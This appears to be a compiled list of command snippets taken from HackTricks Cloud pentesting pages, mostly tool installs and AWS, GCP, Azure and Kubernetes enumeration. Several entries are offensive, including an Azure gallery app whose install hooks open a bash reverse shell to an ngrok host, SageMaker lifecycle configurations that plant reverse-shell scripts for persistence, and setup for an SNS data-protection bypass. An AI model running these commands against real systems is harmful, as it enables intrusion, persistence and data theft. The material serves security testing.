      - certificates.k8s.io
    resources:
      - signers
    resourceNames:
      - example.com/my-signer-name # example.com/* can be used to authorize for all signers in the 'example.com' domain
    verbs:
      - approve
```

--------------------------------

### Install Homebrew on macOS

Source: https://github.com/hacktricks-wiki/hacktricks-cloud/blob/master/src/pentesting-cloud/azure-security/az-enumeration-tools.md

Installs Homebrew, a package manager for macOS, which is a prerequisite for installing PowerShell.
```bash
/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"
```

--------------------------------

### Deploy SQL Queries via GitHub Actions

Source: https://github.com/hacktricks-wiki/hacktricks-cloud/blob/master/src/pentesting-cloud/azure-security/az-services/az-mysql.md

Setup and execution commands for running SQL files against a server using GitHub repository integration.

```bash
# Setup
az mysql flexible-server deploy setup \
  -s \
  -g \
  -u \
  -p "" \
  --sql-file \
  --repo \
  --branch \
  --action-name \
  --allow-push

# Run it
az mysql flexible-server deploy run \
  --action-name \
  --branch
```

--------------------------------

### Enumerate MLflow Servers, Autopilot, and JumpStart

Source: https://github.com/hacktricks-wiki/hacktricks-cloud/blob/master/src/pentesting-cloud/aws-security/aws-services/aws-sagemaker-enum/README.md

Commands to list and describe MLflow tracking servers, AutoML jobs, and JumpStart resources.

```bash
aws sagemaker list-mlflow-tracking-servers --region $REGION
aws sagemaker describe-mlflow-tracking-server --tracking-server-name --region $REGION
aws sagemaker list-auto-ml-jobs --region $REGION
aws sagemaker describe-auto-ml-job --auto-ml-job-name --region $REGION
aws sagemaker list-jumpstart-models --region $REGION
aws sagemaker list-jumpstart-script-resources --region $REGION
```

--------------------------------

### Install Prowler Security Scanner

Source: https://github.com/hacktricks-wiki/hacktricks-cloud/blob/master/src/pentesting-cloud/pentesting-cloud-methodology.md

Installs the Prowler security tool using pip and verifies the installation by checking its version. Prowler supports AWS, GCP, and Azure.

```bash
pip install prowler
prowler -v
```

--------------------------------

### Install Airflow with Helm on Minikube

Source: https://github.com/hacktricks-wiki/hacktricks-cloud/blob/master/src/pentesting-ci-cd/apache-airflow-security/README.md

Use Helm to install Apache Airflow on a Minikube cluster.
This command adds the Airflow Helm repository and installs the Airflow release.

```bash
helm repo add airflow-stable https://airflow-helm.github.io/charts
helm repo update
helm install airflow-release airflow-stable/airflow
# Some information about how to access the web console will appear after this command

# Use this command to delete it
helm delete airflow-release
```

--------------------------------

### Start a Minikube Cluster

Source: https://github.com/hacktricks-wiki/hacktricks-cloud/blob/master/src/pentesting-cloud/kubernetes-security/kubernetes-basics.md

Initiates a local Kubernetes cluster using Minikube. This command automatically selects a driver, downloads necessary images, and configures the cluster.

```bash
$ minikube start
😄 minikube v1.19.0 on Ubuntu 20.04
✨ Automatically selected the virtualbox driver. Other choices: none, ssh
💿 Downloading VM boot image ...
    > minikube-v1.19.0.iso.sha256: 65 B / 65 B [-------------] 100.00% ? p/s 0s
    > minikube-v1.19.0.iso: 244.49 MiB / 244.49 MiB 100.00% 1.78 MiB p/s 2m17.
👍 Starting control plane node minikube in cluster minikube
💾 Downloading Kubernetes v1.20.2 preload ...
    > preloaded-images-k8s-v10-v1...: 491.71 MiB / 491.71 MiB 100.00% 2.59 MiB
🔥 Creating virtualbox VM (CPUs=2, Memory=3900MB, Disk=20000MB) ...
🐳 Preparing Kubernetes v1.20.2 on Docker 20.10.4 ...
    ▪ Generating certificates and keys ...
    ▪ Booting up control plane ...
    ▪ Configuring RBAC rules ...
🔎 Verifying Kubernetes components...
    ▪ Using image gcr.io/k8s-minikube/storage-provisioner:v5
🌟 Enabled addons: storage-provisioner, default-storageclass
🏄 Done! kubectl is now configured to use "minikube" cluster and "default" namespace by defaul
```

--------------------------------

### Setup SNS Topic and SQS Queue

Source: https://github.com/hacktricks-wiki/hacktricks-cloud/blob/master/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sns-post-exploitation/aws-sns-data-protection-bypass.md

Creates the infrastructure required to test the policy bypass.

```bash
TOPIC_ARN=$(aws sns create-topic --name ht-dlp-bypass-$(date +%s) --region $REGION --query TopicArn --output text)
Q_URL=$(aws sqs create-queue --queue-name ht-dlp-exfil-$(date +%s) --region $REGION --query QueueUrl --output text)
Q_ARN=$(aws sqs get-queue-attributes --queue-url "$Q_URL" --region $REGION --attribute-names QueueArn --query Attributes.QueueArn --output text)
aws sqs set-queue-attributes --queue-url "$Q_URL" --region $REGION --attributes Policy=Version:2012-10-17
```

--------------------------------

### Install Google Cloud SDK in Docker

Source: https://github.com/hacktricks-wiki/hacktricks-cloud/blob/master/src/pentesting-cloud/gcp-security/gcp-services/gcp-cloud-build-enum.md

Installs the Google Cloud SDK within a Docker image. This involves downloading the SDK archive, extracting it, and running the installation script.

```bash
curl https://dl.google.com/dl/cloudsdk/release/google-cloud-sdk.tar.gz > /tmp/google-cloud-sdk.tar.gz
mkdir -p /usr/local/gcloud
tar -C /usr/local/gcloud -xvf /tmp/google-cloud-sdk.tar.gz
/usr/local/gcloud/google-cloud-sdk/install.sh
```

--------------------------------

### Create Mount Point and Mount Disk

Source: https://github.com/hacktricks-wiki/hacktricks-cloud/blob/master/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-compute-post-exploitation.md

Create a directory to serve as a mount point and then mount a disk device to it.
```bash
sudo mkdir -p /mnt/disks/[MOUNT_DIR]
```

```bash
sudo mount -o discard,defaults /dev/[DISK_DEVICE] /mnt/disks/[MOUNT_DIR]
```

--------------------------------

### Install PowerShell on macOS

Source: https://github.com/hacktricks-wiki/hacktricks-cloud/blob/master/src/pentesting-cloud/azure-security/az-enumeration-tools.md

Installs the latest stable release of PowerShell using Homebrew.

```bash
brew install powershell/tap/powershell
```

--------------------------------

### Manage Lifecycle Configuration on Notebook Instances

Source: https://github.com/hacktricks-wiki/hacktricks-cloud/blob/master/src/pentesting-cloud/aws-security/aws-persistence/aws-sagemaker-persistence/README.md

Commands to create and attach a Lifecycle Configuration to a notebook instance.

```bash
# Create Lifecycle Configuration
aws sagemaker create-notebook-instance-lifecycle-config \
  --notebook-instance-lifecycle-config-name attacker-lcc \
  --on-start Content=$(base64 -w0 reverse_shell.sh)

# Attach Lifecycle Configuration to Notebook Instance
aws sagemaker update-notebook-instance \
  --notebook-instance-name victim-instance \
  --lifecycle-config-name attacker-lcc
```

--------------------------------

### Create Studio Lifecycle Configurations by App Type

Source: https://github.com/hacktricks-wiki/hacktricks-cloud/blob/master/src/pentesting-cloud/aws-security/aws-persistence/aws-sagemaker-persistence/README.md

Commands to create Lifecycle Configurations for specific SageMaker Studio application types.
```bash
aws sagemaker create-studio-lifecycle-config \
  --studio-lifecycle-config-name attacker-jupyter-lcc \
  --studio-lifecycle-config-app-type JupyterServer \
  --studio-lifecycle-config-content $(base64 -w0 reverse_shell.sh)
```

```bash
aws sagemaker create-studio-lifecycle-config \
  --studio-lifecycle-config-name attacker-kernelgateway-lcc \
  --studio-lifecycle-config-app-type KernelGateway \
  --studio-lifecycle-config-content $(base64 -w0 kernel_persist.sh)
```

```bash
aws sagemaker create-studio-lifecycle-config \
  --studio-lifecycle-config-name attacker-codeeditor-lcc \
  --studio-lifecycle-config-app-type CodeEditor \
  --studio-lifecycle-config-content $(base64 -w0 editor_persist.sh)
```

--------------------------------

### Jenkins Secret Example

Source: https://github.com/hacktricks-wiki/hacktricks-cloud/blob/master/src/pentesting-ci-cd/jenkins-security/README.md

An example of how a Jenkins secret might appear in the credentials.xml file.

```xml
credentials.xml: {AQAAABAAAAAwsSbQDNcKIRQMjEMYYJeSIxi2d3MHmsfW3d1Y52KMOmZ9tLYyOzTSvNoTXdvHpx/kkEbRZS9OYoqzGsIFXtg7cw==}
```

--------------------------------

### Create and Deploy Azure Gallery Application

Source: https://github.com/hacktricks-wiki/hacktricks-cloud/blob/master/src/pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-machines-and-network-privesc.md

Steps to create a gallery, define an application, and deploy it to a virtual machine.
```powershell
$rg = "rg-name"
$location = "Central US"
$galleryName = "myGallery"
$appName = "myReverseShellApp"
$subscription="subscription-id"

# Create gallery
New-AzGallery -ResourceGroupName $rg -Name $galleryName -Location $location

# Create app in gallery
New-AzGalleryApplication `
  -ResourceGroupName $rg `
  -GalleryName $galleryName `
  -Name $appName `
  -Location $location `
  -SupportedOSType Linux

# Create app version
$versionName = "1.0.2"
## create ngrok listener
New-AzGalleryApplicationVersion `
  -ResourceGroupName $rg `
  -GalleryName $galleryName `
  -GalleryApplicationName $appName `
  -Name $versionName `
  -Location $location `
  -PackageFileLink "$sasToken" `
  -Install "bash -c 'bash -i >& /dev/tcp/6.tcp.eu.ngrok.io/19334 0>&1'" `
  -Remove "bash -c 'bash -i >& /dev/tcp/6.tcp.eu.ngrok.io/19334 0>&1'" `
  -Update "bash -c 'bash -i >& /dev/tcp/6.tcp.eu.ngrok.io/19334 0>&1'"

# Launch app
$appVersionId = "/subscriptions/$subscription/resourceGroups/$rg/providers/Microsoft.Compute/galleries/$galleryName/applications/$appName/versions/$versionName"
$app = New-AzVmGalleryApplication -PackageReferenceId $appVersionId
$vm = Get-AzVM -ResourceGroupName $rg -Name $vmName
Add-AzVmGalleryApplication -VM $vm -GalleryApplication $app
Update-AzVM -ResourceGroupName $rg -VM $vm
```

--------------------------------

### View Startup Script Output

Source: https://github.com/hacktricks-wiki/hacktricks-cloud/blob/master/src/pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/README.md

Check the output of startup scripts on a VM instance using journalctl.

```bash
sudo journalctl -u google-startup-scripts.service
```

--------------------------------

### Launch ROADrecon GUI

Source: https://github.com/hacktricks-wiki/hacktricks-cloud/blob/master/src/pentesting-cloud/azure-security/az-enumeration-tools.md

Start the ROADrecon web UI to explore the collected dataset. The GUI helps visualize relationships between privileged users, roles, and devices.
```bash
roadrecon gui
```

--------------------------------

### Install Terrascan via Homebrew

Source: https://github.com/hacktricks-wiki/hacktricks-cloud/blob/master/src/pentesting-ci-cd/terraform-security.md

Install the Terrascan tool using the Homebrew package manager.

```bash
brew install terrascan
```

--------------------------------

### Install and Scan with Terrascan

Source: https://github.com/hacktricks-wiki/hacktricks-cloud/blob/master/src/pentesting-ci-cd/terraform-security.md

Install Terrascan using Homebrew and scan a directory for IaC misconfigurations.

```bash
brew install terrascan
terrascan scan -d /path/to/folder
```

--------------------------------

### Programmatic POST Request via FlareProx

Source: https://github.com/hacktricks-wiki/hacktricks-cloud/blob/master/src/pentesting-ci-cd/cloudflare-security/cloudflare-workers-pass-through-proxy-ip-rotation.md

Python example demonstrating how to initialize FlareProx, ensure endpoints exist, and send a POST request through a random worker endpoint.

```python
#!/usr/bin/env python3
from flareprox import FlareProx, FlareProxError
import json

# Initialize
flareprox = FlareProx(config_file="flareprox.json")
if not flareprox.is_configured:
    print("FlareProx not configured. Run: python3 flareprox.py config")
    exit(1)

# Ensure endpoints exist
endpoints = flareprox.sync_endpoints()
if not endpoints:
    print("Creating proxy endpoints...")
    flareprox.create_proxies(count=2)

# Make a POST request through a random endpoint
try:
    post_data = json.dumps({
        "username": "testuser",
        "message": "Hello from FlareProx!",
        "timestamp": "2025-01-01T12:00:00Z"
    })

    headers = {
        "Content-Type": "application/json",
        "User-Agent": "FlareProx-Client/1.0"
    }

    response = flareprox.redirect_request(
        target_url="https://httpbin.org/post",
        method="POST",
        headers=headers,
        data=post_data
    )

    if response.status_code == 200:
        result = response.json()
        print("✓ POST successful via FlareProx")
        print(f"Origin IP: {result.get('origin', 'unknown')}")
        print(f"Posted data: {result.get('json', {})}")
    else:
        print(f"Request failed with status: {response.status_code}")

except FlareProxError as e:
    print(f"FlareProx error: {e}")
except Exception as e:
    print(f"Request error: {e}")
```

--------------------------------

### List and Describe Backups

Source: https://github.com/hacktricks-wiki/hacktricks-cloud/blob/master/src/pentesting-cloud/gcp-security/gcp-services/gcp-cloud-sql-enum.md

Enumerate available backups for a Cloud SQL instance and retrieve detailed information about a specific backup.

```bash
gcloud sql backups list --instance
gcloud sql backups describe --instance
```

--------------------------------

### Install Dependencies for dsnap

Source: https://github.com/hacktricks-wiki/hacktricks-cloud/blob/master/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-ebs-snapshot-dump.md

Installs the necessary Python package and package managers for using dsnap.
```bash
# Install dependencies
pip install 'dsnap[cli]'
brew install vagrant
brew install virtualbox
```

--------------------------------

### Submit a build with a configuration file

Source: https://github.com/hacktricks-wiki/hacktricks-cloud/blob/master/src/pentesting-cloud/gcp-security/gcp-services/gcp-cloud-build-enum.md

Submits a build to Cloud Build using a specified configuration file and region. This command clones a sample project and then submits it for building.

```bash
git clone https://github.com/GoogleCloudBuild/cloud-console-sample-build && \
  cd cloud-console-sample-build && \
  gcloud builds submit --config cloudbuild.yaml --region=global
```

--------------------------------

### List SageMaker Notebook Instance Lifecycle Configurations

Source: https://github.com/hacktricks-wiki/hacktricks-cloud/blob/master/src/pentesting-cloud/aws-security/aws-services/aws-sagemaker-enum/README.md

Lists available lifecycle configurations for SageMaker notebook instances. These scripts run during notebook instance creation or startup.

```bash
aws sagemaker list-notebook-instance-lifecycle-configs --region $REGION
```

--------------------------------

### Test Pod Deployment with Admission Controller

Source: https://github.com/hacktricks-wiki/hacktricks-cloud/blob/master/src/pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/README.md

Commands to deploy a test pod and observe the behavior of the admission controller.

```bash
kubectl run nginx --image nginx
kubectl get po -w
```

--------------------------------

### App Engine Manifest Example

Source: https://github.com/hacktricks-wiki/hacktricks-cloud/blob/master/src/pentesting-cloud/gcp-security/gcp-services/gcp-app-engine-enum.md

Example of a manifest.json file describing application components and their source URLs.
```json
{"requirements.txt":{"sourceUrl":"https://storage.googleapis.com/staging.onboarding-host-98efbf97812843.appspot.com/a270eedcbe2672c841251022b7105d340129d108","sha1Sum":"a270eedc_be2672c8_41251022_b7105d34_0129d108"},"main_test.py":{"sourceUrl":"https://storage.googleapis.com/staging.onboarding-host-98efbf97812843.appspot.com/0ca32fd70c953af94d02d8a36679153881943f32","sha1Sum":"0ca32fd7_0c953af9_4d02d8a ..."}
```